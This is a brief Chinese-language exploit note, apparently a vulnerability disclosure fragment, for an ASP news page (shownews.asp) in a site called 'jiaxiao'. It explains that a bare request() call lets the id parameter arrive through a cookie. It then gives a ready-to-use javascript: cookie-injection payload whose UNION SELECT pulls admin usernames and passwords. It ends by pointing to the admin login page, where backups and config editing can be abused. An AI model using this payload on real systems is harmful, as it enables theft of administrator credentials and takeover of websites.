*/
单纯的reuqest(),并没用指定是request.querystring(),还是request.form,或request.cookie ().

利用:

http://localhost/jiaxiao/shownews.asp

javascript:alert(document.cookie="id="+escape("107 and 1=2 union select 1,username,password,4,5,6,7,8,9,10,11 from admin"))

后台admin/login.asp有备份,和修改配置文件